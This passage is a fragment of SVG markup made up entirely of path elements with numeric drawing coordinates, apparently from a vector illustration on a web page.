d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path 